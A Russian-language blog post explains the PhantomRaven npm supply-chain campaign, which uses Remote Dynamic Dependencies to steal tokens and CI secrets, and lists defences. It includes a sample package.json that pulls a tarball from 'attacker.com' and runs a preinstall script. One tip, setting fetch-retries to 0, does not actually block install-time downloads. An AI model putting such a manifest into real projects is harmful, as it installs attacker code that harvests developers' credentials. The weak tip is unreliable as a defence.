PhantomRaven в npm 2026: как RDD-атаки крадут токены и бьют по цепочке поставок

hannadev

Обложка: PhantomRaven в npm 2026: защита от Remote Dynamic Dependencies атак на цепочку поставок

PhantomRaven - это свежая волна атак на npm, где злоумышленники маскируют вредоносный код через Remote Dynamic Dependencies. Пакеты выглядят чистыми, но при установке тянут payload с внешних серверов. Защищаться нужно срочно - теряются npm-токены, GitHub-ключи и CI/CD-секреты.

Эта техника бьет по цепочке поставок, обходя сканеры безопасности. В 2026 году выявили новые волны с 88+ пакетами. Разработчики по всему миру уже пострадали - больше 86 тысяч установок. Пора разбираться, как это работает и как фиксить.

Что такое PhantomRaven и RDD-механизм

PhantomRaven - кампания атак на цепочку поставок в npm. Злоумышленники публикуют пакеты с нулевыми зависимостями, но в package.json вместо версии dep’а вписывают HTTP-URL. При npm install пакет-менеджер сам тянет код с сервера атакующего - это и есть Remote Dynamic Dependencies (RDD).

Пакеты кажутся benign: просто hello-world скрипт. Но во время установки срабатывает preinstall-хук, который запускает скачанный payload. Никто не видит вредоносный код в реестре - сканеры типа npm audit пропускают. Первая волна стартовала в октябре 2025, а в 2026 добавились три новые с 88 пакетами. Атакующий ротирует домены, и каждый install тянет свежий код без кэша и lock’а.

Кампания крадет данные из env, git-config и CI-систем. Примеры пакетов: petstore-integration-test, где версии эволюционировали от простого malware к RDD. Endor Labs нейтрализовали сбор данных без апдейтов в npm - круто, но проблема в слепых зонах инструментов.

Вот как выглядит типичный package.json с RDD:

{
  "name": "fake-package",
  "version": "1.0.0",
  "dependencies": {
    "malicious-dep": "https://attacker.com/payload.tgz"
  },
  "scripts": {
    "preinstall": "node sneaky-script.js"
  }
}

RDD прячет payload: npm тянет tarball с внешнего URL, не проверяя реестр.
Авто-выполнение: preinstall-хук запускается всегда, даже в глубоких deps.
Нет версионирования: каждый install - новый код от атакующего.
Обход сканеров: статический анализ видит 0 deps, audit проходит.
Цели кражи: npm tokens, GitHub creds, CI/CD secrets из env vars.

Аспект	Обычные deps	RDD в PhantomRaven
Место кода	npm реестр	Внешний сервер
Видимость	Полная	Невидима для сканеров
Кэш/lock	Да	Нет, свежий каждый раз
Выполнение	Только runtime	Preinstall на install

Как payload крадет данные в PhantomRaven

Payload в PhantomRaven - это бэкдор ~28KB для x64 с анти-анализом и C2 через BNB Smart Chain. Он сканирует среду: ищет email в env, git config, npmrc. Собирает токены из GitHub Actions, GitLab CI, Jenkins, CircleCI.

Малварь использует lifecycle hooks npm для stealth. Нет явного кода в пакете - всё динамически. Атакующий меняет endpoints, но паттерны повторяются: сбор creds -> эксфильтрация на C2. В новых волнах пакеты генерятся AI для правдоподобных имён - разработчики клюют на знакомые названия.

Пример кражи: скрипт парсит process.env на GITHUB_TOKEN, NPM_TOKEN. Потом пушит на attacker server. Koi Security первыми заметили в 2025 - 126 пакетов, 86k downloads. В 2026 эволюционировало: больше пакетов, лучше маскировка.

Ключевые фичи payload:

Сканирование env vars: Авто-поиск токенов без хардкода.
Анти-анализ: Обфускация, многоступенчатая доставка.
C2 через crypto: BNB Smart Chain для эксфильтрации.
Гибкость: Атакующий меняет код на лету по User-Agent.
Масштаб: 88 пакетов в новых волнах, ротация аккаунтов npm.

Волна	Пакетов	Downloads	Новинки
1 (2025)	126	86k+	Базовый RDD
2-4 (2026)	88	Неизвестно	AI-имена, ротация

Защита от RDD-атак в цепочке поставок

Стандартные инструменты слепы к RDD: npm audit, Snyk не тянут внешние URL. Нужно блокировать network calls на install и в CI. Включи npm config set fetch-retries 0 или proxy с фильтрами. Используй lockfile строго - но RDD их игнорирует.

В CI/CD: air-gapped builds, deny-net правила. Скань preinstall скрипты вручную или либой типа socket-lint. Мониторь свежие пакеты с низким score. Endor Labs показали: коллаборативный блок без апдейтов реестра работает.

Переходи на pinned deps и bundle analysis. Для фронта/ноды: socket shrinkwrap для полной картины. Регулярно ротируй токены - это must-have после PhantomRaven.

Практические шаги:

npm ci вместо install: Строго по lockfile, меньше динамики.
Блокируй lifecycle scripts: npm config set ignore-scripts true.
Скань внешние deps: Либы типа supply-chain-defender или custom proxy.
Мониторинг env: Secrets scanning в CI, как GitHub Advanced Security.
Аудит новых deps: Только trusted publishers, score >90.

Инструмент	Защищает от RDD?	Плюсы	Минусы
npm audit	Нет	Бесплатно	Слепо к URL
Socket.dev	Частично	AI-детект	Платно
Endor Labs	Да	Коллаб	Enterprise

Почему PhantomRaven меняет правила игры

PhantomRaven показал дыры в npm: динамические deps - слепая зона для всех. Атакующие эволюционируют быстрее девайсов - AI генерит пакеты, ротация infra. В 2026 это не разовая акция, а ongoing threat с новыми волнами.

Осталось копать: как AI усиливает typosquatting и что с другими менеджерами вроде pnpm/yarn. Подумай о full supply-chain visibility - от dev машины до prod. Традиционные сканеры устаревают, пора к runtime protection и behavioral analysis.